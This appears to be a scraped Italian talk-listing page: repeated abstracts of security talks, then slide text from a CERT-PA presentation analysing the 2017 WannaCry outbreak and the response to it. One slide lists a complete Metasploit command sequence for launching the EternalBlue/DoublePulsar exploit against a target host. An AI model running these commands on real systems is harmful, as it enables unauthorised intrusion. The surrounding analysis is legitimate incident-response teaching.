Quello di venerdì 12 Maggio 2017 è stato definito il cyberattacco più esteso, un attacco globale senza precedenti che ha interessato tantissime organizzazioni e aziende sparse in diversi Paesi del mondo. Tra le vittime dei Paesi colpiti figura anche l'Italia. Nel corso del talk si vuole illustrare come il CERT-PA (Computer Emergency Response Team) della Pubblica Amministrazione italiana ha affrontato il venerdì nero e i giorni a seguire il cyberattacco per gestire e contrastare tempestivamente la minaccia. Un tuffo dentro WannaCry per comprendere i dettagli tecnici, la genesi, le evoluzioni del malware e l'importanza della cooperazione informatica tra CERT italiani, europei e ricercatori indipendenti.
abstract:
Panoramica del mondo dei router SoHo dei principali provider Italiani alla scoperta delle loro vulnerabilità,dagli attacchi per ottenere l'accesso alla rete wireless a quelli per reindirizzare il traffico internet e/o modificare la configurazione del router. Analizzeremo poi l'alternativa opensource OpenWrt e le sue potenzialità.
bio:
Raffaele Sommese appassionato di reti e sicurezza informatica,partecipa negli anni ad alcune analisi di sicurezza su router SoHo.Nella vita studia Ingegneria Informatica alla Federico II, ama viaggiare (in treno),è membro del NaLug dal 2009 e si diletta come Sistemista a "tempo perso".
Case Study sul malware "Gromozon", ispirato da un articolo di Marco Giuliani. Presentazione tenuta a Infosecurity 2007 con Luigi Mori, autore della sezione sul Reverse Engineering.
abstract:
Panoramica del mondo dei router SoHo dei principali provider Italiani alla scoperta delle loro vulnerabilità,dagli attacchi per ottenere l'accesso alla rete wireless a quelli per reindirizzare il traffico internet e/o modificare la configurazione del router. Analizzeremo poi l'alternativa opensource OpenWrt e le sue potenzialità.
bio:
Raffaele Sommese appassionato di reti e sicurezza informatica,partecipa negli anni ad alcune analisi di sicurezza su router SoHo.Nella vita studia Ingegneria Informatica alla Federico II, ama viaggiare (in treno),è membro del NaLug dal 2009 e si diletta come Sistemista a "tempo perso".
Case Study sul malware "Gromozon", ispirato da un articolo di Marco Giuliani. Presentazione tenuta a Infosecurity 2007 con Luigi Mori, autore della sezione sul Reverse Engineering.
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceMario Rossano
Slide di presentazione del progetto Programma Il Futuro (http://www.programmailfuturo.it) che mi ha visto come progettista del software in cooperazione con Marco Ferrigno che ha curato l'infrastruttura di rete.
Il progetto, ideato dal prof. Giorgio Ventre (Univ. "Federico II" di Napoli) ed il prof. Enrico Nardelli (Univ. di Roma "Tor Vergata") per il CINI (Consorzio Interuniversitario Nazionale per l'Informatica) ed il MIUR (Ministero dell'Istruzione, Università e Ricerca), fa parte de "La Buona Scuola", iniziativa promossa dal Ministro Giannini, in collegamento con il progetto internazionale Code.org tra i cui testimonial Barak Obama.
Il portale, che è il primo ad integrare la crittografia frattale FNA che ho sviluppato, ha come cuore il sistema di registrazione con profilazione capillare - a nodi - degli utenti, ed il bridge di comunicazione (un hack) verso il sistema di registrazione di code.org e di hourofcode.com.
Nelle slides i link ipertestuali verso pastebin.com dove sono riportate alcune parti del codice crittografico e del bridge in Perl.
In questo seminario ho simulato un Penetration Test completo partendo dalla fase di raccolta delle informazioni fino ad arrivare alla fase in cui l'attaccante penetra nel sistema e installa una backdoor per rafforzare la propria presenza nel sistema violato.
Durante ogni singola fase mi sono fermato a parlare di essa portando esempi sia teorici che demo pratiche.
Questo seminario nasce con lo scopo di appassionare i ragazzi e soprattutto far conoscere ad essi il mondo della sicurezza informatica rivolta ai test di penetrazione. Questo seminario nasce dall'invito che ho ricevuto da parte dell'istituto G.B. Vaccarini, essendo io stesso, un loro ex studente.
Il workshop ha come obiettivo quello di presentare lo stato dell’arte dei Crypto-Malware/Ransomware che crittografano i file di dati di PC e SERVER e ne richiedono il riscatto.
Sarà effettuata una panoramica sulle principali famiglie/tipologie di Crypto-Malware che tra il 2015 e l’inizio del 2016 si sono diffuse maggiormente in Italia andando ad analizzare le modalità di attacco e i danni causati.
Verranno presentati i comportamenti adatti ad evitare l’infezione e/o contrastare efficacemente la cifratura dei file.
Si procederà poi a simulare un attacco reale da Crypto-Malware mostrando gli effetti su PC privo di sistema di protezione in grado di segnalare l’attacco e, di seguito, a fronte dello stesso attacco, su PC / SERVER sui quali sia presente un sistema di protezione euristico-comportamentale in grado di segnalarne e mitigarne gli effetti anche da varianti di nuova generazione quindi non ancora identificabili con i metodi di intercettazione classici.
Checkmate to crypto malware. Scacco matto ai crypto malwareGianfranco Tonello
How defeat the crypto-malware as CryptoLocker, CryptoWall, CTBLocker, TeslaCrypt and CryptoLocky. In this presentation we shows as VirIT can block the process of crypto-malware, while the malware is encrypting the file of documents and we can save the files that remain. You can see the video of youtube: https://youtu.be/_SyKqqZu6-8
La conferenza ha come obiettivo quello di presentare al pubblico lo stato dell’arte dei Crypto-Malware che crittografano i file di dati di PC e SERVER e ne richiedono un riscatto.
Verrà effettuata una panoramica sulla principali famiglie/tipologie di Crypto-Malware che tra il 2015 e l’inizio del 2016 si sono diffusi maggiormente in Italia andando ad analizzare le modalità di diffusione e i danni che hanno provocato.
Verranno presentati i comportamenti adatti ad evitare l’infezione e/o a contrastarla efficacemente.
Si procederà poi a simulare un attacco reale da Crypto-Malware e su cosa accade se il PC non ha un sistema di protezione in grado di segnalare l’attacco e, di seguito a fronte dello stesso attacco cosa sarebbe accaduto se sul PC / SERVER fosse presente un sistema di protezione euristico-comportamentale in grado, quindi, di segnalare e mitigare gli effetti dell’attacco anche da varianti di nuova generazione quindi non ancora identificabili con il metodo delle firme.
BackBox Linux: Simulazione di un Penetration TestAndrea Draghetti
Venerdì 11 dicembre alle 21:15 in via Episcopio Vecchio 9 a Forlì, presso l’Istituto Salesiano “Orselli”, avremo il piacere di ospitare Andrea Draghetti, componente del Team di Sviluppo del progetto BackBox Linux ed esperto in sicurezza informatica. Con noi ci saranno anche i nostri amici di ImoLUG, per compagnia e supporto come da miglior tradizione acara.
Si tratta di una serata dal carattere prettamente tecnico ed operativo che inaugura un piccolo ed informale laboratorio collaborativo di sicurezza informatica e computer forensics, nato dalle richieste di alcuni soci del Folug aperto a chiunque sia interessato a questi argomenti.
Data la natura dell’incontro e la notevole professionalità del relatore si “smanetterà” alla grande; quindi lasciate perdere testi teorici e preparatevi a vedere esempi pratici degli argomenti che verranno trattati:
1. Nmap (Scansione porte, fingerprint, ecc)
2. Dirs3arch (File e Directory Bruteforce)
3. Wpscan (Scanner di exploit della piattaforma wordpress)
4. SQLMap (sqlinjection)
5. Metasploit (Remote File Inclusion e Privilege Escalation)
Il sistema operativo di riferimento sarà BackBox Linux, distro italiana votata alla sicurezza informatica ed alle analisi forensi, particolarmente apprezzata da chi scrive per la sua versalità, stabilità e completezza. Questa distro raccoglie al suo interno, secondo le linee guida del software Debian, tutta una serie di tools sia relativi alla sicurezza informatica per aiutare gli ethical hackers nel loro lavoro di messa in sicurezza di sistemi e di applicazioni sia strumenti finalizzati a svolgere analisi sui computer per la ricerca di prove (computer forensics), senza dimenticare la possibilità di essere usata come distro “da tutti i giorni”.
Di seguito, il link per poterne scaricare una copia:
https://www.backbox.org/downloads
L’evento non potrà essere trasmesso in streaming a causa della connessione raccapricciantemente lenta della nostra sede, ma, nello stile Open Source che ci ha sempre contraddistinto, tutto il materiale liberamente pubblicabile sarà postato nel nostro blog quanto prima… speriamo con qualche sorpresa
Fonte: http://www.folug.org/2015/12/06/serate-l-folug-il-pen-test-con-backbox-linux/
LinuxDay 2009
Una presentazione rivolta agli studenti del triennio informatico di un ITIS su Linux e qualche nozione di sicurezza. Venne accompagnata da una demo di social hacking su Facebook.
Gli attacchi alla supply chain open source di nuova generazione sono aumentati del 400% nei primi mesi del 2021.
Gli hackers sono sempre più creativi e stanno ricorrendo ad attacchi alla supply-chain di nuova generazione per trasformare i progetti open source in canali di distribuzione di malware.
Perché invadere l'ecosistema open source? La ragione è che i componenti compromessi possono essere immediatamente sfruttati una volta scaricati.
Adottare un approccio secure by design è al momento l'unica arma di difesa. Ne parliamo in questo webinar, in compagnia di Riccardo Bernasconi e Gabriele Gianoglio
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisurewalk2talk srl
•Introduzione Black Hat vs White Hat (CEH)
Gli hacker, i cracker, e gli etici, le differenze tra gli esperti di sicurezza reti
•Il problema “umano”
anche un sistema più protetto avrà sempre un limite dato da chi lo utilizza
•Le vulnerabilità odierne, i sistemi e cosa usare per craccare le reti
i maggiori problemi di sicurezza attuali, quali sistemi sono vulnerabili e che sistemi usare per gli attacchi e le difese
•Fingerprinting e Footprinting (google hack e tools online)
i primi step di un attacco sono acquisire informazioni sul target, come farlo in maniera passiva senza essere scoperti
•Social Engineering e Guerrilla Gifting
la più potente di tutte le tecniche: il Social Engineering, cosa è come si usa, esempi pratici e tecniche per farsi "amare" dai bersagli
•Shoulder surfing, Impersonation, Piggybacking
Tecniche di social engineering semplici ma potenti per accedere ad una struttura
•Bucare una rete wifi e contromisure
cosa usare e come fare per bucare una rete wireless
•Wireshark ed altri tool per i penetration test
il tool primario per l'analisi del traffico ed altri tools importanti per capire dove ci troviamo
•Nessus e l’Active Directory Priviledge Escalation
tool di analisi della struttura Microsoft e come fare AD escalation
•Il security patching VS l’unpatched
le patch di sicurezza, i problemi legati al patching e quelli legati all'unpatching
•Il livello della security oggi
il livello della security oggi in Italia a distanzia di 1 anno dalla CCI 2017
•Come diventare Expert di Security oggi
breve vedemecum su come indirizzare la propria carriera lavorativa sulla security
By Alessandro Vannini
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfHelpRansomware
LockBit è un ransomware che rientra nella categoria dei RaaS, ovvero ransomware as a service.
Nello specifico si tratta di un cryptovirus della famiglia di Cryptolocker ideato allo scopo di sottrarre alle vittime i dati sensibili che vengono restituiti solo dopo il pagamento del riscatto.
Linux Day 2014 - Napoli - Programma Il Futuro: una scelta open sourceMario Rossano
Slide di presentazione del progetto Programma Il Futuro (http://www.programmailfuturo.it) che mi ha visto come progettista del software in cooperazione con Marco Ferrigno che ha curato l'infrastruttura di rete.
Il progetto, ideato dal prof. Giorgio Ventre (Univ. "Federico II" di Napoli) ed il prof. Enrico Nardelli (Univ. di Roma "Tor Vergata") per il CINI (Consorzio Interuniversitario Nazionale per l'Informatica) ed il MIUR (Ministero dell'Istruzione, Università e Ricerca), fa parte de "La Buona Scuola", iniziativa promossa dal Ministro Giannini, in collegamento con il progetto internazionale Code.org tra i cui testimonial Barak Obama.
Il portale, che è il primo ad integrare la crittografia frattale FNA che ho sviluppato, ha come cuore il sistema di registrazione con profilazione capillare - a nodi - degli utenti, ed il bridge di comunicazione (un hack) verso il sistema di registrazione di code.org e di hourofcode.com.
Nelle slides i link ipertestuali verso pastebin.com dove sono riportate alcune parti del codice crittografico e del bridge in Perl.
In questo seminario ho simulato un Penetration Test completo partendo dalla fase di raccolta delle informazioni fino ad arrivare alla fase in cui l'attaccante penetra nel sistema e installa una backdoor per rafforzare la propria presenza nel sistema violato.
Durante ogni singola fase mi sono fermato a parlare di essa portando esempi sia teorici che demo pratiche.
Questo seminario nasce con lo scopo di appassionare i ragazzi e soprattutto far conoscere ad essi il mondo della sicurezza informatica rivolta ai test di penetrazione. Questo seminario nasce dall'invito che ho ricevuto da parte dell'istituto G.B. Vaccarini, essendo io stesso, un loro ex studente.
Il workshop ha come obiettivo quello di presentare lo stato dell’arte dei Crypto-Malware/Ransomware che crittografano i file di dati di PC e SERVER e ne richiedono il riscatto.
Sarà effettuata una panoramica sulle principali famiglie/tipologie di Crypto-Malware che tra il 2015 e l’inizio del 2016 si sono diffuse maggiormente in Italia andando ad analizzare le modalità di attacco e i danni causati.
Verranno presentati i comportamenti adatti ad evitare l’infezione e/o contrastare efficacemente la cifratura dei file.
Si procederà poi a simulare un attacco reale da Crypto-Malware mostrando gli effetti su PC privo di sistema di protezione in grado di segnalare l’attacco e, di seguito, a fronte dello stesso attacco, su PC / SERVER sui quali sia presente un sistema di protezione euristico-comportamentale in grado di segnalarne e mitigarne gli effetti anche da varianti di nuova generazione quindi non ancora identificabili con i metodi di intercettazione classici.
Checkmate to crypto malware. Scacco matto ai crypto malwareGianfranco Tonello
How defeat the crypto-malware as CryptoLocker, CryptoWall, CTBLocker, TeslaCrypt and CryptoLocky. In this presentation we shows as VirIT can block the process of crypto-malware, while the malware is encrypting the file of documents and we can save the files that remain. You can see the video of youtube: https://youtu.be/_SyKqqZu6-8
La conferenza ha come obiettivo quello di presentare al pubblico lo stato dell’arte dei Crypto-Malware che crittografano i file di dati di PC e SERVER e ne richiedono un riscatto.
Verrà effettuata una panoramica sulla principali famiglie/tipologie di Crypto-Malware che tra il 2015 e l’inizio del 2016 si sono diffusi maggiormente in Italia andando ad analizzare le modalità di diffusione e i danni che hanno provocato.
Verranno presentati i comportamenti adatti ad evitare l’infezione e/o a contrastarla efficacemente.
Si procederà poi a simulare un attacco reale da Crypto-Malware e su cosa accade se il PC non ha un sistema di protezione in grado di segnalare l’attacco e, di seguito a fronte dello stesso attacco cosa sarebbe accaduto se sul PC / SERVER fosse presente un sistema di protezione euristico-comportamentale in grado, quindi, di segnalare e mitigare gli effetti dell’attacco anche da varianti di nuova generazione quindi non ancora identificabili con il metodo delle firme.
BackBox Linux: Simulazione di un Penetration TestAndrea Draghetti
Venerdì 11 dicembre alle 21:15 in via Episcopio Vecchio 9 a Forlì, presso l’Istituto Salesiano “Orselli”, avremo il piacere di ospitare Andrea Draghetti, componente del Team di Sviluppo del progetto BackBox Linux ed esperto in sicurezza informatica. Con noi ci saranno anche i nostri amici di ImoLUG, per compagnia e supporto come da miglior tradizione acara.
Si tratta di una serata dal carattere prettamente tecnico ed operativo che inaugura un piccolo ed informale laboratorio collaborativo di sicurezza informatica e computer forensics, nato dalle richieste di alcuni soci del Folug aperto a chiunque sia interessato a questi argomenti.
Data la natura dell’incontro e la notevole professionalità del relatore si “smanetterà” alla grande; quindi lasciate perdere testi teorici e preparatevi a vedere esempi pratici degli argomenti che verranno trattati:
1. Nmap (Scansione porte, fingerprint, ecc)
2. Dirs3arch (File e Directory Bruteforce)
3. Wpscan (Scanner di exploit della piattaforma wordpress)
4. SQLMap (sqlinjection)
5. Metasploit (Remote File Inclusion e Privilege Escalation)
Il sistema operativo di riferimento sarà BackBox Linux, distro italiana votata alla sicurezza informatica ed alle analisi forensi, particolarmente apprezzata da chi scrive per la sua versalità, stabilità e completezza. Questa distro raccoglie al suo interno, secondo le linee guida del software Debian, tutta una serie di tools sia relativi alla sicurezza informatica per aiutare gli ethical hackers nel loro lavoro di messa in sicurezza di sistemi e di applicazioni sia strumenti finalizzati a svolgere analisi sui computer per la ricerca di prove (computer forensics), senza dimenticare la possibilità di essere usata come distro “da tutti i giorni”.
Di seguito, il link per poterne scaricare una copia:
https://www.backbox.org/downloads
L’evento non potrà essere trasmesso in streaming a causa della connessione raccapricciantemente lenta della nostra sede, ma, nello stile Open Source che ci ha sempre contraddistinto, tutto il materiale liberamente pubblicabile sarà postato nel nostro blog quanto prima… speriamo con qualche sorpresa
Fonte: http://www.folug.org/2015/12/06/serate-l-folug-il-pen-test-con-backbox-linux/
LinuxDay 2009
Una presentazione rivolta agli studenti del triennio informatico di un ITIS su Linux e qualche nozione di sicurezza. Venne accompagnata da una demo di social hacking su Facebook.
Gli attacchi alla supply chain open source di nuova generazione sono aumentati del 400% nei primi mesi del 2021.
Gli hackers sono sempre più creativi e stanno ricorrendo ad attacchi alla supply-chain di nuova generazione per trasformare i progetti open source in canali di distribuzione di malware.
Perché invadere l'ecosistema open source? La ragione è che i componenti compromessi possono essere immediatamente sfruttati una volta scaricati.
Adottare un approccio secure by design è al momento l'unica arma di difesa. Ne parliamo in questo webinar, in compagnia di Riccardo Bernasconi e Gabriele Gianoglio
CCI2018 - Ethical Hacking, gli step di un attacco e le contromisurewalk2talk srl
•Introduzione Black Hat vs White Hat (CEH)
Gli hacker, i cracker, e gli etici, le differenze tra gli esperti di sicurezza reti
•Il problema “umano”
anche un sistema più protetto avrà sempre un limite dato da chi lo utilizza
•Le vulnerabilità odierne, i sistemi e cosa usare per craccare le reti
i maggiori problemi di sicurezza attuali, quali sistemi sono vulnerabili e che sistemi usare per gli attacchi e le difese
•Fingerprinting e Footprinting (google hack e tools online)
i primi step di un attacco sono acquisire informazioni sul target, come farlo in maniera passiva senza essere scoperti
•Social Engineering e Guerrilla Gifting
la più potente di tutte le tecniche: il Social Engineering, cosa è come si usa, esempi pratici e tecniche per farsi "amare" dai bersagli
•Shoulder surfing, Impersonation, Piggybacking
Tecniche di social engineering semplici ma potenti per accedere ad una struttura
•Bucare una rete wifi e contromisure
cosa usare e come fare per bucare una rete wireless
•Wireshark ed altri tool per i penetration test
il tool primario per l'analisi del traffico ed altri tools importanti per capire dove ci troviamo
•Nessus e l’Active Directory Priviledge Escalation
tool di analisi della struttura Microsoft e come fare AD escalation
•Il security patching VS l’unpatched
le patch di sicurezza, i problemi legati al patching e quelli legati all'unpatching
•Il livello della security oggi
il livello della security oggi in Italia a distanzia di 1 anno dalla CCI 2017
•Come diventare Expert di Security oggi
breve vedemecum su come indirizzare la propria carriera lavorativa sulla security
By Alessandro Vannini
Come Funziona Il Ransomware LockBit? Decrittazione E Recupero Dati.pdfHelpRansomware
LockBit è un ransomware che rientra nella categoria dei RaaS, ovvero ransomware as a service.
Nello specifico si tratta di un cryptovirus della famiglia di Cryptolocker ideato allo scopo di sottrarre alle vittime i dati sensibili che vengono restituiti solo dopo il pagamento del riscatto.
Ogni volta che con il nostro computer ci colleghiamo alla Rete, che sia per svolgere attività personali o di lavoro, ci esponiamo al rischio di essere infettati da virus e altri software malevoli oppure che ci vengano carpiti dati per noi molto importanti.
Ma tranquilli, riuscire a proteggersi è possibile e con le soluzioni che trovate qui sarà facile oltre che economico!
Ecco 12 soluzioni free ed Open Source da usare subito!
Sicurezza & Linux, principali tecniche di attacco ai sistemi informatici, tecniche psicologiche, conservazione dei dati. Creata in occasione del LinuxDay 2009.
__
di: Mora Fabio, Pignatelli Simone
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniSalvatore Lentini
In questo talk viene analizzata una semplice backdoor realizzata in Python. Il talk procede con l'explotation di una macchina Windows 7 tramite un attacco di Pishing e subito dopo con l'installazione di una backdoor persistence facendo vedere alcune delle funzionalità offerte. Il talk si conclude invitando l'utente a nascondere la propria webcam sensibilizzandolo sull'argomento. Il motivo per cui ho scelto di parlare di questo argomento, ha a che fare con le differenze che sorgono tra software open e software close, dato che nel primo è possibile tramite la lettura e comprensione del codice capire se il sistema ha routine di codice che si comportano come backdoor mentre nel secondo non sappiamo se ne esistono (data l'impossibilità di leggere il codice sorgente) e quindi dal momento che la sicurezza non si è mai basata sulla fiducia del produttore, è importante prevenire (mettendo delle etichette di plastica sulle nostre webcam).
Programma il futuro: una scelta open sourceMarco Ferrigno
Un'analisi tecnica dello strumento che avrà un grande impatto culturale sul futuro del nostro Paese: Programma Il Futuro. Nato da un'idea che ha visto coinvolti Il MIUR, il CINI – Consorzio Interuniversitario Nazionale per l’Informatica - e aziende IT intervenute come sponsor, l'iniziativa ha l’obiettivo di fornire alle scuole una serie di strumenti semplici, divertenti e facilmente accessibili per formare gli studenti ai concetti di base dell'informatica. Il fine ultimo è dunque la formazione sin dalla tenera età del pensiero computazionale. Scopriremo insieme al collega Mario Rossano (responsabile della progettazione software) il perchè di un approccio opensource ad un progetto ad elevata criticità per il sistema Paese.
Come recuperare file crittografati da diversi dispositivi [2022].pdfHelpRansomware
La crittografia è un metodo utilizzato per proteggere i file, in modo da evitare che chiunque possa accedervi, anche senza una chiave di
accesso o password.
Questi file possono essere attaccati da diversi tipi di virus, che ne
mettono a rischio le informazioni, come avviene con il temutissimo
ransomware.
3. HackInBo Winter Edition 2017
Agenda
● Ransomware
○ Come li avevamo conosciuti
○ Come si sono evoluti
● Leak
○ CIA
○ NSA
● Il weekend nero
○ Analisi di Wannacry
○ Evoluzioni
5. HackInBo Winter Edition 2017
C’era una volta MBR Lock
...correva l’anno 2012
● Master Boot Record compromesso;
● MBR originale sostituito con MBR proprietario;
● Dati sul disco integri, sistema non è accessibile;
● Per ottenere la password era necessario chiamare un
numero a pagamento per ricevere il codice (c0d3).
6. HackInBo Winter Edition 2017
Soluzione
● Era sufficiente ripristinare il
Master Boot Record per
accedere al sistema.
● Analisi successive hanno
dimostrato che il codice accetta
come password qualsiasi stringa
composta da 14 cifre.
8. HackInBo Winter Edition 2017
Varianti 2014 - 2015
2014 - CTB Locker
● utilizza Tor per raggiungere il C&C
● componenti Tor embedded
● distribuito tramite Drive-by download e Spam
2015 - TeslaCrypt
● destinato alla cummunity di videogiochi, successivamente esteso ai classici documenti
● elimina le Shadow Copy e i punti di ripristino
● distribuito attraverso i kit di Angler, Sweet Orange e Nuclear exploit.
Download inconsapevole:
● Pop-up
● Error message
● Redirect
● Exploit
9. HackInBo Winter Edition 2017
Varianti 2015 - 2016
2015 - 2016 – MSIL
● sfrutta i server Web vulnerabili Java (JBoss obsolete)
● funzionalità di trojan
● utilizza psexec.exe per veicolare il malware verso host della stessa rete
2016 – Locky
● si propaga attraverso messaggi di posta elettronica
● allegati MS Office (macro) o compressi (.rar, .zip) con JS
● distribuito utilizzando il kit Nuclear Exploit
10. HackInBo Winter Edition 2017
Tecniche di evasione
● Differenti vettori di infezione
○ Exploit Kit
● Offuscamento del codice
○ Codifica
● Riconoscimento dell’ambiente
○ Fisico, virtuale, sandbox
● Rilevamento dei tool di analisi in esecuzione sul sistema
○ Strumenti di debug e di monitoraggio del traffico
11. HackInBo Winter Edition 2017
Scripting
L'uso di tecniche di scripting non è nuovo (VBS, HTA, JS, PS)
● facili da offuscare
● difficili da individuare
● nella maggior parte dei casi sono dei downloader
● spesso richiamano altri script
● tutelano il malware vero e proprio
https://a.pomfe.co/lmvkqth.jpg
https://infosec.cert-pa.it/analyze/e10bdb0fe7ad6fed9e8dcc4418aede45.html
15. HackInBo Winter Edition 2017
Marble Framework
Marzo 2017 - Set di strumenti in grado di:
● Offuscare codice nocivo;
● Implementare tecniche Anti-Forensics.
Allo scopo di:
● Mascherare malware, trojan e attacchi di hacking;
● Evitare che un attacco possa essere ricondotto alla CIA.
16. HackInBo Winter Edition 2017
Vault7: Source Code
● Russo
● Cinese
● Arabo
● Farsi
Mascherare gli hack della CIA e concentrare l’attenzione degli investigatori su altri Paesi.
17. HackInBo Winter Edition 2017
Hacking Tools
● The Shadow Brokers
○ Equation Group
■ NSA
Il primo annuncio del leak risale al 13
agosto 2016 (via twitter)
18. HackInBo Winter Edition 2017
MS16-114 - SMB 1.0 Protocollo Obsoleto!
Il 13 settembre 2016 - appena un mese dopo l’annuncio del leak - Microsoft informa gli utenti di una
importante vulnerabilità che affligge il protocollo SMB 1.0 e che consentirebbe l’esecuzione di codice
remoto.
Per ragioni di sicurezza Microsoft invita gli utenti a disabilitare il protocollo obsoleto.
“If you have not already, follow the instructions in the blog to turn off SMB1 in your environment. You do
not need this 30-year-old protocol, and you certainly do not want it.” - Microsoft.
19. HackInBo Winter Edition 2017
MS17-101 - SMB 1.0 Patch
Il 14 marzo 2017 Microsoft rilascia un aggiornamento risolutivo per la vulnerabilità nel protocollo SMB
1.0 annunciata nel settembre 2016.
20. HackInBo Winter Edition 2017
Eternal*
14 Aprile 2017 – Microsoft dirama i risultati di
analisi interne che riguardano la pubblicazione di
alcuni exploit sottratti a «Equation Group» (NSA)
rilasciati pubblicamente da un gruppo di hacker
noto come «The Shadow Brokers».
22. HackInBo Winter Edition 2017
Venerdì, 12 Maggio 2017
CCN-CERT (Spagna)
Il primo CERT, almeno in Europa, a diramare la
notizia di un attacco massivo è il CERT spagnolo.
https://www.ccn-cert.cni.es/seguridad-al-dia/comunic
ados-ccn-cert/4464-ataque-masivo-de-ransomware-q
ue-afecta-a-un-elevado-numero-de-organizaciones-es
panolas.html
23. HackInBo Winter Edition 2017
È questione di minuti...
● Telefonate
● Messaggi
● Email
● Collaborazione tra CERT
a livello europeo;
● Infosharing tra CERT
italiani.
● Infosharing con Vendor
● Collaborazione tra ricercatori
di tutto il mondo;
● Public infosharing su Twitter,
AlienVault (IoC), GitHub.
24. HackInBo Winter Edition 2017
Cosa emerge dalle prime informazioni
Sistemi affetti:
● Microsoft Windows Vista SP2
● Windows Server 2008 SP2 e R2 SP1
● Windows 7
● Windows 8.1
● Windows RT 8.1
● Windows Server 2012 e R2
● Windows 10
● Windows Server 2016
Sistemi affetti fuori supporto:
● Microsoft Windows XP
25. HackInBo Winter Edition 2017
Quali danni ha provocato?
● 300.000 (?) computer compromessi in oltre 150 paesi in meno di 24 ore;
● In Spagna è stata confermata la compromissione di grosse aziende tra cui la compagnia di
telecomunicazioni "Telefonica";
● In Gran Bretagna pare che il ransomware abbia preso in ostaggio i PC di alcuni ospedali e strutture
sanitarie.
26. HackInBo Winter Edition 2017
Phishing o Worm?
Si presume che il malware si sia propagato inizialmente tramite posta elettronica, ma al momento non
esiste una traccia ufficiale in circolazione che confermi l'ipotesi.
Non è ancora stato individuato il paziente zero.
27. HackInBo Winter Edition 2017
Come lavora?
● Sfrutta l'exploit di Equation Group (NSA) noto come "EternalBlue" applicabile al protocollo
Windows SMB.
● Una volta infettata una macchina, il malware provvede a scansionare la rete interna alla ricerca di
altre postazioni affette dalla medesima vulnerabilità.
● Individuata la postazione vulnerabile viene eseguito l'exploit per ottenere accesso al sistema e
successivamente cifra i file in esso contenuti rinominandoli con estensione ".WCRY".
● Per recuperare i dati in ostaggio viene chiesto un riscatto iniziale di 300$ in bitcoin, il prezzo sale
man mano che scorre il conto alla rovescia del timer mostrato all'utente.
28. HackInBo Winter Edition 2017
Esistono soluzioni?
● Installare la patch MS17-010;
● Bloccare SMB 1 e 2;
● Mitigare la contaminazione sfruttando al meglio
gli IoC.
○ Hash, Imphash, IP, Domain, Registry key,
Prima informativa sul sito ufficiale CERT-PA
● https://www.cert-pa.it/web/guest/news?id=8342
29. HackInBo Winter Edition 2017
Sample su sandbox online
La presenza online del primo sample su Malwr risale al 12/05/2017 @ 10:19
Dalle analisi automatiche nelle sandbox online non emergono evidenti informazioni relative alla
propagazione.
● https://malwr.com/analysis/MTlhYjAzNTExNjllNGU0YThmMTRlZTRiOWE4YzhkZDI/
● https://www.reverse.it/sample/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703
480b1022c?environmentId=100
33. HackInBo Winter Edition 2017
IoC Sharing
Problematiche riscontrate:
● Verifica dell’attendibilità
● Formati differenti
● Conversione in formato testuale
● Separatori improvvisati
● Rimozione dei duplicati
● Gestione dei feedback
34. HackInBo Winter Edition 2017
Hashr
● È un tool scritto e mantenuto dagli analisti
del CERT-PA
● Consente di computare hash dei file e
ricercare corrispondenza su una lista di hash
predefinita (ad esempio IoC di hash);
● Distributito alla constituency;
● Tipologie di ricerche
○ ricorsive
○ per tipologia di file
● Non è di pubblico dominio
35. HackInBo Winter Edition 2017
Microsoft rilascia Patch per Windows XP
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
37. HackInBo Winter Edition 2017
Nuove varianti
Poche ore dopo la notizia dell’esistenza di un
kill-switch, si ha evidenza di nuovi sample:
● con kill-switch differenti
● senza kill-switch
38. HackInBo Winter Edition 2017
Kill-Switch e Proxy
INTERNET_OPEN_TYPE_DIRECT
(Resolves all host names locally.)
https://blog.didierstevens.com/2017/05/13/quickp
ost-wcry-killswitch-check-is-not-proxy-aware/
39. HackInBo Winter Edition 2017
Sezione Resource
La sezione «Resource» contiene un eseguibile, un pacchetto di circa 3,5 MB
https://infosec.cert-pa.it/analyze/db349b97c37d22f5ea1d1841e3c89eb4.html
40. HackInBo Winter Edition 2017
MSSECSVC2.0
Il worm installa un servizio denominato “mssecsvc2.0”.
Nome visualizzato: “Microsoft Security Center (2.0) service”.
Quando il servizio è installato provvede a caricare i moduli per la
cifratura.
41. HackInBo Winter Edition 2017
Network traffic
● Tenta di connettersi alla rete locale alla ricerca di SMB
vulnerabile;
● Genera indirizzi IP pubblici casuali per lo stesso scopo;
● Se trova una postazione vulnerabile, viene trasferito il
malware ed eseguito su di esso.
path/to/mssecsvc -m security
44. HackInBo Winter Edition 2017
Da analisi successive
● Cifra 177 tipologie di file
● .wnry, .wcry, .wncry, .wncrypt
● RSA-2048 encryption keys with AES-128 encryption
● SMB Exploit (MS-17010) EternalBlue
● Sezione Resources contiene un pacchetto eseguibile
● TOR C&C
● Diversi indirizzi Bitcoin
● DNS Kill-Switch
● Persistenza garantita tramite registro di sistema
46. HackInBo Winter Edition 2017
EternalBlue e Metasploit
● msf > use windows/smb/eternalblue_doublepulsar
● msf > exploit (eternalblue_doublepulsar) > set eternalbluepath
root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
● msf > exploit (eternalblue_doublepulsar) > set doublepulsarpath
root/Desktop//Eternalblue-Doublepulsar-Metasploit/deps
● msf > exploit (eternalblue_doublepulsar) > set targetarchitecture x64
● msf > exploit (eternalblue_doublepulsar) > set processinject lsass.exe
● msf > exploit (eternalblue_doublepulsar) > set lhost 192.168.1.2
● msf > exploit (eternalblue_doublepulsar) > set rhost 192.168.1.3
● msf > exploit (eternalblue_doublepulsar) > exploit
47. HackInBo Winter Edition 2017
EternalRocks – WannaCry Evolution
● EternalRocks è la versione avanzata di WannaCry
● Oltre gli exploit di WannaCry (EternalBlue e DoublePulsar) sfrutta altri exploit:
○ EternalChampion;
○ EternalRomance;
○ EternalSynergy;
○ ArchiTouch;
○ SMBTouch.
48. HackInBo Winter Edition 2017
EternalRocks in due Step
● 1° STEP: Download TOR client per raggiungere il C&C
● 2° STEP: Dopo 24h arriva la risposta dal C&C che invia un pacchetto denominato
«shadowbrokers.zip»
50. HackInBo Winter Edition 2017
Similitudini
Neel Mehta, ricercatore di Google, ha trovato
alcune somiglianze tra una delle prime varianti di
